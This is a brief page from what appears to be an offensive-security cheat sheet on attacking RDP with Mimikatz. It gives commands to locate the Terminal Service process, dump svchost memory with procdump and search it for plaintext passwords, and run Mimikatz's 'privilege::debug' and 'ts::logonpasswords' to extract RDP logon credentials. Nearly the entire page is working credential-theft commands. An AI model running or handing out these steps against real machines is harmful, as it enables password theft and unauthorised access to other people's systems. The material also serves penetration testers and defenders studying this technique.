😀RDP

Mimikatz and RDP protocol

Verify Service

sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1

RDP Session Takeover

procdump64.exe -ma 988 -accepteula C:\svchost.dmp
strings -el svchost* | grep Password123 -C3

RDP Passwords

privilege::debug
ts::logonpasswords
PreviousVaultNextcrypto

Last updated